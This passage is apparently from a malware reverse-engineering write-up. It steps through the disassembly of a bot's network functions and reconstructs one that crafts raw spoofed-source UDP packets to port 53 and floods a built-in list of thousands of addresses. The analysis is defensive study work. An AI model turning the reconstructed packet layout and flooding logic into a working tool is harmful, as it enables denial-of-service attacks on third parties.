    function(Buffer1, EncodedBuffer, DataAmount)

Disassembly:

Starting off:

    0x8048ed2: movl 0x8(%ebp),%eax
    0x8048ed5: movl 0x10(%ebp),%edi
    0x8048ed8: cmpl $0x0,0x807e784
    0x8048edf: je 0x8048f10

0x8(%ebp) corresponds to Buffer1. 0x10(%ebp) corresponds to DataAmount. 0x807e784 was earlier named Global_B. Global_B was set by the second case section in the "Core Functionality".

If Global_B is NOT 0:

We commence a loop, starting with:

    0x8048ee1: movl %eax,%ebx
    0x8048ee3: leal 0x24(%ebx),%esi
    0x8048ee6: leal (%esi),%esi
    0x8048ee8: pushl $0xfa0
    0x8048eed: call 0x80555b0

The code at 0x80555b0 is believed to be usleep() code. 0xfa0 would be a 4000 microsecond sleep. Following this:

    0x8048ef2: pushl %edi
    0x8048ef3: movl 0xc(%ebp),%edx
    0x8048ef6: pushl %edx
    0x8048ef7: pushl %ebx
    0x8048ef8: pushl $0x807e780
    0x8048efd: call 0x8048f94

%edi will still be set to DataAmount. %edx will have been set to EncodedBuffer. %ebx was earlier set to Buffer1. The contents of 0x807e780 appear to initially consist of all 0's.
The analysis in the "Core Functionality" section has shown that a particular packet using the binary's communication channel can be used to set the first four bytes of this buffer to the destination IP of an incoming packet (expected to be the machine running the binary). The call to 0x8048f94 has not yet been identified. It was earlier followed and revealed to contain network functionality (which is why this function was believed to be a network related function). This extra function will now be named Network_Function_F and will be analysed later.

The end of the looping structure:

    0x8048f05: addl $0x4,%ebx
    0x8048f08: cmpl %esi,%ebx
    0x8048f0a: jle 0x8048ee8

As can be seen, %ebx is incremented by 4. %esi was earlier set to 36 bytes on top of Buffer1. %ebx starts at the beginning of Buffer1, therefore the jle would result in the loop being repeated 10 times.

If Global_B IS 0:

We have a similar setup to just one iteration of the above loop:

    0x8048f10: pushl %edi
    0x8048f11: movl 0xc(%ebp),%edx
    0x8048f14: pushl %edx
    0x8048f15: pushl %eax
    0x8048f16: pushl $0x807e780
    0x8048f1b: call 0x8048f94

The setup is identical to what we just saw in the above loop. It appears that if Global_B is 0, Network_Function_F is called with the second parameter (push %eax) being set to the start of Buffer1.

No matter what Global_B is, the function now returns.

Disassembly Review:

The whole function hinges on Global_B. If Global_B is 0, it seems to call Network_Function_F with a pointer to the beginning of Buffer1. If Global_B is non-zero, a loop is constructed to call Network_Function_F 10 times, each time passing identical arguments, except for a pointer that starts at the beginning of Buffer1, and is incremented by 4 bytes for each iteration of the loop.

Function Overview:

This function appears to be some kind of wrapper to Network_Function_F. All it seems to do is determine whether Network_Function_F is called 1 time or 10 times, all based upon Global_B.
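The control flow of this wrapper can be sketched in C as below. Everything here is a stand-in: network_function_f is an empty stub (the real code at 0x8048f94 has not been analysed yet), global_b and data_807e780 only mimic the globals at 0x807e784 and 0x807e780, and the counters exist purely so the sketch can be exercised.

```c
#include <stddef.h>
#include <stdint.h>

static int global_b;             /* stands in for Global_B (0x807e784) */
static uint8_t data_807e780[4];  /* stands in for the data at 0x807e780 */
static int f_calls;              /* bookkeeping for this sketch only */
static size_t last_offset;       /* bookkeeping for this sketch only */

/* Stub for the not yet analysed Network_Function_F. */
static void network_function_f(uint8_t *slot, const uint8_t *buf1_pos,
                               const uint8_t *encoded, int data_amount)
{
    (void)slot; (void)buf1_pos; (void)encoded; (void)data_amount;
    f_calls++;
}

static void network_function_a(const uint8_t *buffer1,
                               const uint8_t *encoded, int data_amount)
{
    if (global_b != 0) {
        /* offsets 0, 4, ..., 0x24: ten iterations (jle against Buffer1 + 0x24) */
        for (size_t off = 0; off <= 0x24; off += 4) {
            /* the binary calls what is believed to be usleep(0xfa0) here */
            last_offset = off;
            network_function_f(data_807e780, buffer1 + off, encoded, data_amount);
        }
    } else {
        last_offset = 0;
        network_function_f(data_807e780, buffer1, encoded, data_amount);
    }
}
```

Read this way, Buffer1 looks like an array of ten 4-byte entries that is walked one entry per call, which would fit a list of up to ten IPv4 addresses, although that remains an assumption until Network_Function_F is analysed.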
The only way to work out what is actually going on and why this has any significance is to work out what purpose Buffer1 plays for Network_Function_F. Buffer1's data seems static for the duration of the binary's execution, except when the blackhat manages to call case section 2 from the "Core Functionality" of the binary, in which case they have the ability to set the contents of this buffer of up to 40 bytes.

d) Network_Function_B [0x8049174] - (Network)

Known Usage:

    function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
             *0xfffff005(%ebp), 0, *0xfffff006(%ebp), *0xfffff007(%ebp),
             *0xfffff008(%ebp), 0xffffbb44(%ebp))

Guesses at purpose:

No idea.

Naming Conventions:

Parameters will be given the following names:

    function(LongA, LongB, LongC, LongD, NumberA, LongE, LongF, LongG, Buffer1)

Disassembly:

Start off by loading some parameters into local variables:

    0x8049180: movb 0x8(%ebp),%bl
    0x8049183: movb %bl,0xfffff9bc(%ebp)
    0x8049189: movb 0xc(%ebp),%bl
    0x804918c: movb %bl,0xfffff9b8(%ebp)
    0x8049192: movb 0x10(%ebp),%bl
    0x8049195: movb %bl,0xfffff9b4(%ebp)
    0x804919b: movb 0x14(%ebp),%bl
    0x804919e: movb %bl,0xfffff9b0(%ebp)

Doesn't really help any, so, continuing:

    0x80491a4: leal 0xffffffdc(%ebp),%edi
    0x80491a7: movl $0x8067698,%esi
    0x80491ac: cld
    0x80491ad: movl $0x9,%ecx
    0x80491b2: repz movsl %ds:(%esi),%es:(%edi)

Looking at the loop, it becomes apparent that it takes a starting position at 0x8067698 and copies 9 longs' worth of data to the local stack address of 0xffffffdc(%ebp). The data:

    (gdb) x/36b 0x8067698
    0x8067698: 0x15 0x00 0x00 0x00 0x15 0x00 0x00 0x00
    0x80676a0: 0x14 0x00 0x00 0x00 0x15 0x00 0x00 0x00
    0x80676a8: 0x15 0x00 0x00 0x00 0x19 0x00 0x00 0x00
    0x80676b0: 0x14 0x00 0x00 0x00 0x14 0x00 0x00 0x00
    0x80676b8: 0x14 0x00 0x00 0x00

Obviously forming a buffer of: 21,21,20,21,21,25,20,20,20.
More setup:

    0x80491b4: movl $0x1,0xfffff9ac(%ebp)
    0x80491be: leal 0xfffffde8(%ebp),%edi
    0x80491c4: movl $0x80676bc,%esi
    0x80491c9: cld
    0x80491ca: movl $0x7d,%ecx
    0x80491cf: repz movsl %ds:(%esi),%es:(%edi)

0xfffff9ac(%ebp) is unknown, but is set to 1. A loop is constructed to copy 0x7d longs (500 bytes) from 0x80676bc to a local buffer starting at 0xfffffde8(%ebp). The data:

    (gdb) x/500 0x80676bc
    0x80676bc: 0x47 0x6e 0x01 0x00 0x00 0x01 0x00 0x00
    0x80676c4: 0x00 0x00 0x00 0x00 0x03 0x63 0x6f 0x6d
    0x80676cc: 0x00 0x00 0x06 0x00 0x01 0x00 0x00 0x00
    0x80676d4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x80676dc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x80676e4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    [...]

The full dump has not been produced above. More variable setup occurs, followed by:

    0x8049201: cmpl $0x0,0x18(%ebp)
    0x8049205: je 0x804920a

0x18(%ebp) would correspond to the NumberA parameter of the function. The effect of the conditional appears to be simply to skip the following:

    0x8049207: decl 0x18(%ebp)

The outcome is that if NumberA != 0 then NumberA is decremented.

A call is then set up:

    0x804920a: pushl $0xff
    0x804920f: pushl $0x3
    0x8049211: pushl $0x2
    0x8049213: call 0x8056cf4

This is a socket() call which would look like:

    socket(AF_INET, SOCK_RAW, IPPROTO_RAW)

Checking the result:

    0x8049218: movl %eax,0xfffff9a8(%ebp)
    0x804921e: addl $0xc,%esp
    0x8049221: testl %eax,%eax
    0x8049223: jle 0x8049548

The socket number is moved into 0xfffff9a8(%ebp), with a result <= 0 being treated as an error and resulting in a jump to 0x8049548. If it is successful (>0) then it continues:

    0x8049229: movl $0x0,0xfffff99c(%ebp)
    0x8049233: movl $0x0,0xfffff998(%ebp)
    0x804923d: pushl $0x400
    0x8049242: pushl $0x0
    0x8049244: pushl %esi
    0x8049245: call 0x8057764

%esi was earlier set:

    0x80491d1: leal 0xfffff9c8(%ebp),%esi

The call to 0x8057764 was earlier believed to be a memset().
This fits into this situation and would look like:

    memset(0xfffff9c8(%ebp), 0, 0x400)

This makes something from earlier stand out:

    0x80491d7: leal 0xfffff9dc(%ebp),%ebx
    0x80491e3: leal 0xfffff9e4(%ebp),%ebx

Effectively setting up two variables to point to within the same buffer (it would be strange to memset across multiple buffers). A quick look at the differences between them soon produces suspicions of future uses:

    0xfffff9c8(%ebp) = X
    0xfffff9dc(%ebp) = X + 20
    0xfffff9e4(%ebp) = X + 20 + 8

Keeping in mind an IP header is 20 bytes, and a UDP header is 8, one should definitely be suspicious about these numbers.

Back to the code:

    0x8049252: cmpl $0x0,0x24(%ebp)
    0x8049256: je 0x80492b2
    0x8049258: cmpl $0x0,0xfffff998(%ebp)
    0x804925f: jg 0x80492b2

0x24(%ebp) will correspond to LongG. If it is 0, it will jump to 0x80492b2. 0xfffff998(%ebp) has been seen before, and was set to 0. It is tested to be greater than 0, if so, it will jump to 0x80492b2. Otherwise:

    0x8049261: movl 0x28(%ebp),%ebx
    0x8049264: pushl %ebx
    0x8049265: call 0x804bf80

The call to 0x804bf80 is unknown, so a quick analysis is in order:

    calls 0x804a9d8
    calls 0x804f620 - fopen()
        Looking at parameters passed to this function:
        (gdb) x/1s 0x8067904
        0x8067904: "/etc/host.conf"
        (gdb) x/1s 0x8067913
        0x8067913: "r"
        Checking hosts lookup configuration (perhaps this is some kind of dns function)
    calls 0x804e180
    calls 0x804d744
    calls 0x804dfb4
    calls 0x8057254
        0x8057258: movl $0x4e,%eax
        0x8057263: int $0x80
        gettimeofday()
    calls 0x8056e64 (does nothing system-wise)
    calls 0x8057230
        0x8057233: movl $0x14,%eax
        0x8057238: int $0x80
        getpid()
    calls 0x8056e64 (already analysed)
    calls 0x804e490
    calls 0x804f620 - fopen()
        (gdb) x/1s 0x8067d6b
        0x8067d6b: "HOSTALIASES"
        Definitely raises suspicion of host resolution function.
    calls 0x804dfe0
    calls 0x804d744
    calls 0x804f620 - fopen()
        (gdb) x/1s 0x8067c0f
        0x8067c0f: "/etc/resolv.conf"
        Most probably a gethostby* function.
    calls 0x804b800
    calls 0x804d02c (does nothing system-wise)
    calls 0x804d6b8 (does nothing system-wise)
    calls 0x804a5cc
    calls 0x8056cf4 (socket())

The function analysis above is in no way complete (far from it). Random checks of certain calls have revealed what looks like a form of host resolution function. At this stage it is unknown exactly what function it is, however a look at the parameters passed to it shows it to be called as:

    function(Buffer1)

A few assumptions were made and tested about this function, which in the end looks to be:

    struct hostent *gethostbyname(Buffer1)

The reasoning behind this identification is primarily the way the result is used (this will be looked at shortly). The function located at 0x804bf80 will be named gethostbyname for the rest of this analysis.

The result of this function is then tested:

    0x804926a: movl %eax,%edx
    0x804926c: addl $0x4,%esp
    0x804926f: testl %edx,%edx
    0x8049271: jne 0x8049288

If the return from gethostbyname() is 0 (fail):

The following is done:

    0x8049273: pushl $0x258
    0x8049278: call 0x80556cc
    0x804927d: movl $0x1,%edi
    0x8049282: addl $0x4,%esp
    0x8049285: jmp 0x80492b2

The call matches up to a sleep(0x258), i.e. a sleep of 600 seconds. The movl sees to the setting of %edi to 1. This was earlier set to 0. It is unknown what role this plays as yet.

If the return from gethostbyname() is nonzero (successful):

Execution continues:

    0x8049288: pushl $0x4
    0x804928a: leal 0xfffff9c4(%ebp),%eax
    0x8049290: pushl %eax
    0x8049291: movl 0x10(%edx),%eax
    0x8049294: movl (%eax),%eax
    0x8049296: pushl %eax
    0x8049297: call 0x8056480

0x8056480 is unidentified as a function, so we analyse it:

    0x8056505: repz movsl %ds:(%esi),%es:(%edi)

It primarily consists of loops set up to copy data. %esi, %edi, and %ecx are all based upon parameters to this function. It's done in such a way that the above stack setup *should* result in 0x4 bytes from *0x10(%edx) being copied to 0xfffff9c4(%ebp).
Judging from its position, the function is probably some compiler-placed one rather than home-made (so to speak). It may be as simple as a memcpy or bcopy, but since there is no *real* way to be sure, it will be named as Misc_Data_Copy.

The reasoning behind believing the earlier function to be gethostbyname() is the way a parameter is passed to Misc_Data_Copy. More specifically, 0x10(%edx) is set up as being offset by +16 bytes from %edx (which was earlier set to the return value from the function). In looking at the hostent structure:

    struct hostent {
        __const char *h_name;   /* official name of host */
        char **h_aliases;       /* alias list */
        int h_addrtype;         /* host address type */
        int h_length;           /* length of address */
        char **h_addr_list;     /* list of addresses */
    };

An offset of 0x10 (16) bytes would point to h_addr_list. The data copy above would effectively result in the copy of 4 bytes (length of an IPv4 address) from the first address in this list, to 0xfffff9c4(%ebp). This all fits in very well with the rest of this function, so it is assumed to be correct.

The IP address seems to then be stored:

    0x804929c: movl 0xfffff9c4(%ebp),%eax
    0x80492a2: movl %eax,0xc(%esi)
    0x80492a5: movl $0x9c40,0xfffff998(%ebp)

0xc(%esi) corresponds to 12 bytes after 0xfffff9c8(%ebp). Keeping in mind the earlier suspicion that 0xfffff9c8(%ebp) is really a buffer to construct a UDP packet, this all fits together with the IP address of the host specified in Buffer1 being placed in the 'source address' position of the buffer (bytes 13-16). The variable at 0xfffff998(%ebp) was earlier set to 0 and is now set to 0x9c40 (40000), but its purpose is as yet unknown.

With what looks to be the end of the conditionals, the following code will always be executed:

    0x80492b2: testl %edi,%edi
    0x80492b4: jne 0x8049250

%edi is tested. It was initially set to a state of 0 and would remain in that state unless the gethostbyname() function was called and had a failure, in which case it would be 1.
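The offset arithmetic behind the hostent reasoning can be checked with a small sketch. The struct below is a hypothetical stand-in that models the 32-bit x86 layout explicitly (4-byte pointers and ints), since the real struct hostent would have different offsets when compiled on a 64-bit machine.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical 32-bit image of struct hostent: every field is 4 bytes wide. */
struct hostent32 {
    uint32_t h_name;       /* char *  at offset 0x00 */
    uint32_t h_aliases;    /* char ** at offset 0x04 */
    int32_t  h_addrtype;   /* int     at offset 0x08 */
    int32_t  h_length;     /* int     at offset 0x0c */
    uint32_t h_addr_list;  /* char ** at offset 0x10, read by movl 0x10(%edx),%eax */
};

enum { IPV4_SRC_ADDR_OFFSET = 12 };  /* source address field of an IPv4 header */
```

With this layout, movl 0x10(%edx),%eax loads h_addr_list and the following movl (%eax),%eax loads h_addr_list[0], the pointer to the first address. The 4 bytes it points to are then stored at 0xc(%esi), which is offset 12 of the packet buffer, where an IPv4 header keeps its source address.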
The jump back to 0x8049250 will occur only if gethostbyname() was called and failed. Otherwise:

    0x80492b8: movl $0x0,0xfffff990(%ebp)
    0x80492c2: leal (%esi),%esi
    0x80492c4: cmpl $0x1,0xfffff9ac(%ebp)
    0x80492cb: jne 0x80492e8

0xfffff990(%ebp) is set to 0. 0xfffff9ac(%ebp) was initially set to 1, so at least the first iteration of this code will continue:

    0x80492cd: movl $0x0,0xfffff9ac(%ebp)
    0x80492d7: call 0x8055e38

The same variable is then set back to 0, and a call to 0x8055e38 takes place. This call is short and to the point, but doesn't seem to do anything!?! It does some arithmetic based upon some variables at 0x807895? and returns the result. Looking at the next few statements one would assume it to be some kind of random() function, but that was already assumed to be at 0x8056058. That assumption was never proven and was more a guess based upon where it was called. A quick disassembly of the code at 0x8056058 soon reveals that it actually calls the code at 0x8055e38! This means the earlier assumption is most probably incorrect and that 0x8055e38 is most likely random(). Either way:

    0x80492dc: movl $0x1f40,%ebx
    0x80492e2: idivl %ebx,%eax

This results in %eax being divided by 0x1f40 (8000). The result used from this process is %edx (the remainder), so the operation appears to exist solely as a MOD. This would make a lot of sense if the previous function was indeed random().

If 0xfffff9ac(%ebp) is not 1 (perhaps on following iterations), %edx is set to 0. At this point, %edx is either a random number from 0 to 7999, or 0, depending upon 0xfffff9ac(%ebp) (initially set so that %edx is random). No matter what the last conditional worked out to be, it continues:

    0x80492ea: cmpl $0x0,0x806d22c(,%edx,4)
    0x80492f2: je 0x8049530

A long value at 0x806d22c with offset %edx is checked.
If it is 0, it jumps to 0x8049530; if not, we continue:

    0x80492f8: leal 0x806d22c(,%edx,4),%edx
    0x80492ff: movl %edx,0xfffff994(%ebp)

Once again we use this table offset by %edx, this time to put a memory address into 0xfffff994(%ebp). We then use this address:

    0x8049308: movl 0xfffff994(%ebp),%ebx
    0x804930e: movl (%ebx),%eax
    0x8049310: movl %eax,0xfffffddc(%ebp)
    0x8049316: movl 0xfffff990(%ebp),%ebx

The value at that memory location is extracted and put into 0xfffffddc(%ebp). %ebx is then set to the value at 0xfffff990(%ebp).

    0x804931c: leal 0xfffffde8(%ebp,%ebx,1),%edx
    0x8049323: movl 0xffffffdc(%ebp,%edi,4),%eax
    0x8049327: pushl %eax
    0x8049328: pushl %edx
    0x8049329: movl 0xfffff9a0(%ebp),%ebx
    0x804932f: pushl %ebx
    0x8049330: call 0x805652c

A function call to 0x805652c is set up and executed. The function is not known, but looking at its contents, it forms a memory copy loop such that the above stack setup would result in *0xffffffdc(%ebp,%edi,4) bytes being copied from 0xfffffde8(%ebp,%ebx,1) to the location held in 0xfffff9a0(%ebp). Assuming %edi never exceeds 8, *0xffffffdc(%ebp,%edi,4) would always be one of the following values: 21,21,20,21,21,25,20,20,20 which were placed into the buffer earlier. 0xfffffde8(%ebp,%ebx,1) behaves in the same way: 0xfffffde8(%ebp) was earlier set up as a 500 byte copy of preset data, and %ebx is the index into it. The amount of data specified is copied to the memory location held in 0xfffff9a0(%ebp). This was earlier set to:

    0x80491e3: leal 0xfffff9e4(%ebp),%ebx
    0x80491e9: movl %ebx,0xfffff9a0(%ebp)

A look back at suspicions about this whole section:

    0xfffff9e4(%ebp) = X + 20 + 8

If this was indeed a setup for a UDP IP packet, this data copy would fit in EXACTLY to form the data component of the packet. More randomising code:

    0x8049338: call 0x8055e38
    0x804933d: movl $0xff,%ebx
    0x8049342: cltd
    0x8049343: idivl %ebx,%eax

%edx is now presumed to be a random number from 0 to 0xfe (the remainder of a division by 0xff).
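The ranges produced by the random-then-idivl pattern, and the address formed by 0x806d22c(,%edx,4), can be checked with a small Python sketch. It assumes the function at 0x8055e38 returns a non-negative value, as random() does; the function names are hypothetical and only serve the illustration.

```python
TABLE_BASE = 0x806D22C  # base of the indexed table, taken from the listing
ENTRY_SIZE = 4          # scale factor in 0x806d22c(,%edx,4)

def remainder_range(modulus):
    """Smallest and largest remainder idivl can leave in %edx,
    assuming the dividend is non-negative."""
    return 0, modulus - 1

def table_entry_address(index):
    """Address computed by leal 0x806d22c(,%edx,4) for a given %edx."""
    return TABLE_BASE + ENTRY_SIZE * index

for modulus in (0x1F40, 0xFF):
    low, high = remainder_range(modulus)
    print(f"mod 0x{modulus:x}: {low}..{high}")
print(hex(table_entry_address(0x1F40 - 1)))
```

Note that a MOD by 0xff can never yield 0xff itself, and a MOD by 0x1f40 tops out at index 7999.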
It's then stored:

    0x8049345: movl 0xfffff9a0(%ebp),%ebx
    0x804934b: movb %dl,(%ebx)

A byte of this remainder (it is below 255 anyway) replaces the first byte of the data component and, oddly enough, the process is repeated to replace the second byte as well:

    0x8049360: movb %dl,0x1(%ebx)

0x1c(%ebp) and 0x20(%ebp) are then checked. These variables match up to LongE and LongF. If LongE and LongF are both 0, we do another random() call with:

    0x8049374: movl $0x7530,%ebx
    0x804937a: idivl %ebx,%eax
    0x804937c: movl %edx,%eax

Resulting in %eax being some random number from 0 to 0x752f (MOD 30000). If either LongE or LongF is non-zero:

    0x8049380: movl 0x1c(%ebp),%eax
    0x8049383: shll $0x8,%eax
    0x8049386: addw 0x20(%ebp),%ax

The low-order end of %eax is filled such that LongE forms %ah. At this point, %eax holds either a random number below 0x7530, or a value formed from LongE and LongF. Whatever the outcome:

    0x804938a: xchgb %al,%ah

The two bytes are exchanged (possibly a crude/optimised form of htons()?). Some more of the 'believed packet' is constructed:

    0x804938c: movl 0xfffff9a4(%ebp),%ebx
    0x8049392: movw %ax,(%ebx)
    0x8049395: movl 0xfffff9a4(%ebp),%ebx
    0x804939b: movw $0x3500,0x2(%ebx)
    0x80493a1: movw 0xffffffdc(%ebp,%edi,4),%ax
    0x80493a6: addw $0x8,%ax
    0x80493aa: xchgb %al,%ah
    0x80493ac: movw %ax,0x4(%ebx)

The exchanged bytes are put into place at what would correspond to the UDP header's source port (this definitely explains the exchange). 2 bytes after this (the destination port), 0x3500 is positioned. 0x3500 corresponds to a destination port of 53 (DNS). 0x4(%ebx) corresponds to the UDP length, and is set to 0x8 (UDP header length) plus an indexed value starting at 0xffffffdc(%ebp). This starting point saw 9 values between 20 and 25 placed in and after it.

    0x80493b0: movw $0x0,0x6(%ebx)
    0x80493b6: cmpl $0x0,0x24(%ebp)
    0x80493ba: jne 0x80493ec

0x6(%ebx) would be the UDP header checksum, and is set to 0.
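The UDP header layout being inferred here can be reproduced with a short Python sketch. It is not code recovered from the binary, just a check of the byte order reasoning; the function name, the example source port 0x1234 and the payload length 21 are assumptions chosen for illustration.

```python
import struct

UDP_HEADER_LEN = 8
DNS_PORT = 53

def build_udp_header(src_port, payload_len):
    """Pack source port, destination port 53, length and a zero checksum
    in network byte order."""
    return struct.pack("!HHHH", src_port, DNS_PORT,
                       UDP_HEADER_LEN + payload_len, 0)

# movw $0x3500 on little-endian x86 stores the bytes 00 35, which a
# receiver reads as port 0x0035 = 53.
stored = (0x3500).to_bytes(2, "little")
print(stored.hex(), int.from_bytes(stored, "big"))

header = build_udp_header(0x1234, 21)  # example values only
print(header.hex())
```

The same byte order argument explains the xchgb before each 16-bit store: a value computed in host order has to be swapped before it is written into the packet.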
A value corresponding to LongG is then checked, and if it is zero, some copying takes place. The actual values will be LongA, LongB, LongC, and LongD (see the code at 0x8049180 to know why). They are placed into the 'packet buffer' at the position of the IP header source address. It should be noted here that if LongG was non-zero, the earlier gethostbyname() would have been called, and if successful, it would have filled in the source IP address.

    0x80493ec: movl 0xfffff994(%ebp),%ebx
    0x80493f2: movl (%ebx),%eax
    0x80493f4: movl %eax,0x10(%esi)
    0x80493f7: movb $0x45,(%esi)

0xfffff994(%ebp) was earlier set as a pointer to some indexed data. The long value from that memory location is copied to 0x10(%esi). %esi at this point should still be set to the beginning of the 'packet buffer', and 16 bytes into that buffer is the destination IP address. That indexed buffer must correspond to IP addresses? [Considering the index was a random 0 to 7999, this leads one to assume there's either an error, or this binary contains 8000 IP addresses!?!?]

0x45 (such an easily recognisable number!) is moved into the first byte of the 'packet buffer'. This corresponds to an IP version 4 packet with a header length of 5 (five 32-bit words, i.e. a 20 byte header). There is now no doubt that this buffer is indeed for packet construction.

    0x80493fa: call 0x8055e38
    0x80493ff: movl $0x82,%ebx
    0x8049404: cltd
    0x8049405: idivl %ebx,%eax
    0x8049407: addb $0x78,%dl
    0x804940a: movb %dl,0x8(%esi)

Once again, random + mod code, this time with a +0x78. This is inserted into the IP TTL field (this explains the +0x78!). It ensures the TTL is always between 120 and 249. Some more randomising code, modded by 255, followed by:

    0x804941a: movw %dx,0x4(%esi)
    0x804941e: movb $0x11,0x9(%esi)
    0x8049422: movw $0x0,0x6(%esi)

This corresponds to the IP header ID being a random number from 0 to 254. The 0x11 goes into the IP protocol position (UDP!) and the 0 goes into the IP offset position.
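Two of the values above can be sanity-checked numerically: the 0x45 first byte and the TTL range produced by a MOD 0x82 followed by +0x78. The Python below is a minimal sketch with hypothetical helper names, assuming the random value is non-negative.

```python
def split_version_ihl(first_byte):
    """Split the first IP header byte into (version, header length in bytes)."""
    version = first_byte >> 4
    header_bytes = (first_byte & 0x0F) * 4  # IHL counts 32-bit words
    return version, header_bytes

def ttl_range(modulus=0x82, base=0x78):
    """Lowest and highest TTL produced by (random % modulus) + base."""
    return base, base + modulus - 1

print(split_version_ihl(0x45))
print(ttl_range())
```

The upper TTL bound stays within a single byte, so the addb on %dl cannot wrap.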
    0x8049428: movw 0xffffffdc(%ebp,%edi,4),%ax
    0x804942d: addw $0x1c,%ax
    0x8049431: xchgb %al,%ah
    0x8049433: movw %ax,0x2(%esi)
    0x8049437: movw $0x0,0xa(%esi)

The 0xffffffdc(%ebp,%edi,4) indexed value should still correspond to that 9 number list (20-25). On top of the indexed number, 28 is added. This is obviously the IP header size plus the UDP header size. The bytes of the low-order word are exchanged (effectively a htons()), and this word is put into none other than the total length field of the IP header. 0 is put into the checksum field of the IP header.

This is followed by a long set of arithmetic instructions that operate on the packet data. No changes to the data are made until:

    0x80494a9: movw %ax,0xa(%esi)

Where the result of all these operations is put into the checksum field. It is assumed these operations are some form of inlined checksum function, or that the blackhat author wrote the checksum code directly into this function. (Note that the checksum has NOT been verified to be correct!) We then set up for a call:

    0x80494ad: pushl $0x10
    0x80494af: leal 0xfffffdd8(%ebp),%eax
    0x80494b5: pushl %eax
    0x80494b6: pushl $0x0
    0x80494b8: movl 0xffffffdc(%ebp,%edi,4),%eax
    0x80494bc: addl $0x1c,%eax
    0x80494bf: pushl %eax
    0x80494c0: leal 0xfffff9c8(%ebp),%eax
    0x80494c6: pushl %eax
    0x80494c7: movl 0xfffff9a8(%ebp),%ebx
    0x80494cd: pushl %ebx
    0x80494ce: call 0x8056c3c

The function is unknown, but it doesn't take long to work out what it is:

    0x8056c69: movl $0xb,%edx
    0x8056c71: movl $0x66,%eax
    0x8056c76: movl %edx,%ebx
    0x8056c78: int $0x80

This matches a socketcall (0x66) for SYS_SENDTO (0xb). The first parameter, 0xfffff9a8(%ebp), is indeed the socket returned by socket() (see 0x8049218). The second matches the 'packet buffer'. The third is once again that indexed value plus 28.
The fourth is 0, The fifth is a pointer to 0xfffffdd8(%ebp) which in hindsight makes sense of some earlier value assignments to form a sockaddr_in structure of AF_INET type with port = 0 and the address was earlier (curiously) set to the destination address. In construction of raw packets however, this structure shouldn't have any effect. The final parameter is merely the size of the sockaddr structure. This should send the previously constructed packet off. Analysis of this packet and its reasonings will be discussed in Network_Analysis_C. Following the sendto: 0x80494d6: cmpl $0x0,0x18(%ebp) 0x80494da: jne 0x80494e8 0x80494dc: pushl $0x12c 0x80494e1: call 0x80555b0 0x80494e6: jmp 0x8049507 The check uses the NumberA parameter to this function. If it is 0, it will call usleep(0x12c), and if not: 0x80494e8: movl 0x18(%ebp),%ebx 0x80494eb: cmpl %ebx,0xfffff99c(%ebp) 0x80494f1: jne 0x8049514 0x80494f3: pushl $0x12c 0x80494f8: call 0x80555b0 0x80494fd: movl $0x0,0xfffff99c(%ebp) 0x8049507: decl 0xfffff998(%ebp) 0xfffff99c(%ebp) was earlier set to 0. It compares it to NumberA, and if it is equal to it, it will usleep(0x12c), and set 0xfffff99c(%ebp) to 0. It also decrements the variable at 0xfffff998(%ebp) which seems to be related to the gethostbyname() section. If NumberA was not equal to 0xfffff99c(%ebp), it increments 0xfffff99c(%ebp) by 1. Now comes the interesting part: 0x804951a: addl $0x4,0xfffff994(%ebp) 0x8049521: movl 0xfffff994(%ebp),%ebx 0x8049527: cmpl $0x0,(%ebx) 0x804952a: jne 0x8049308 0xfffff994(%ebp) is used as a pointer to IP addresses, by incrementing it by 4, this moves it onto the next address. The space where the ip address is supposed to be is checked to be 0 (indicator of the end of the list one would assume). If it is not, it jumps back up to 0x8049308 and resends another packet. It repeats this until it hits that null. 
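The throttling logic around usleep(0x12c) can be modelled to see how NumberA affects the packet rate. The Python below is a sketch of the control flow as read from the listing, not recovered source; the function name is made up, and it counts only how often the sleep would be reached.

```python
def sleeps_for(packets, number_a):
    """Count usleep(300) calls made while sending `packets` packets."""
    counter = 0  # models the variable at 0xfffff99c(%ebp)
    sleeps = 0
    for _ in range(packets):
        if number_a == 0 or counter == number_a:
            sleeps += 1   # usleep(0x12c), then decl 0xfffff998(%ebp)
            counter = 0   # already 0 when number_a is 0, reset otherwise
        else:
            counter += 1  # the branch taken to 0x8049514
    return sleeps

for number_a in (0, 1, 4):
    print(number_a, sleeps_for(100, number_a))
```

Under this reading a NumberA of 0 sleeps after every packet, while a NumberA of N sleeps once per N+1 packets, so larger values mean a faster flood.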
Upon reaching the null: 0x8049530: addl $0x32,0xfffff990(%ebp) 0x8049537: incl %edi 0x8049538: cmpl $0x8,%edi 0x804953b: jle 0x80492c4 0x8049541: jmp 0x8049250 0xfffff990(%ebp) is incremented by 50. This is the pointer to the packet data which, upon analysis of the actual indexed data, appears to start again every 50 bytes (with slight differences). %edi is the index for what appears to be the data sizes which will go up to, but not including 9. There then appears to be a jump back up to 0x8049250 which sees to the reset of all the indexes and pointers and restart the process again. It should be noted that there does not appear to be any exit condition, making one assume that this function will continue until the process is killed. Disassembly Review: A long and complex function. It consists primarily of two loops, one which appears to loop through data types which start at 0x80676bc, and another within it that loops through IP addresses which start at 0x806d22c. There appears to be timing considerations included in the code, possibly to alter the speed at which an infected machine will send packets out at. One cannot be sure how many packets per second would be sent without a live test. In reconstructing the function call: Network_Function_B(IPOctet1, IPOctet2, IPOctet3, IPOctet4, FloodSpeed, PortOctet1, PortOctet2, DNSFlag, Hostname) If DNSFlag is 0, the IPOctets are used as the source address for the outgoing packets. If it is non-zero, it will attempt to resolve Hostname. 0xfffff998(%ebp) is also utilised in such a way that it will try to re-resolve the hostname every 40000 usleep()'s (not necessarily every X packets). Function Overview: A very nasty function. It appears to be a form of 'packetting' function. The interesting thing about it is it specifies the source IP, and the destinations are all preset within the binary - at least 8000 of them!! 
